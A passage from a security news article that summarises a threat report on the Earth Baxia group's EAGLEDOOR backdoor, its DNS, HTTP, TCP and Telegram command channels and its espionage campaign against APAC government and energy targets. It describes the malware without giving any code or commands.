<\/a><\/figure>\n\n\n\nThe EAGLEDOOR backdoor can communicate with C2 via DNS, HTTP, TCP, and Telegram. While TCP, HTTP, and DNS are used to send the victim machine’s status, the main backdoor functionality is handled through the Telegram Bot API. The malicious code supports methods like getFile<\/code>, getUpdates<\/code>, sendDocument<\/code>, and sendMessage<\/code> to gather information, transfer files, and execute payloads. However, in the collected samples, only TCP and HTTP protocols were observed on the victim’s side. Earth Baxia exfiltrates data in archives that are transferred using curl.exe<\/code>.<\/p>\n\n\n\n
“Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries.” concludes the report. “They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations.”<\/em><\/gwmw><\/gwmw><\/gwmw><\/p>\n\n\n\n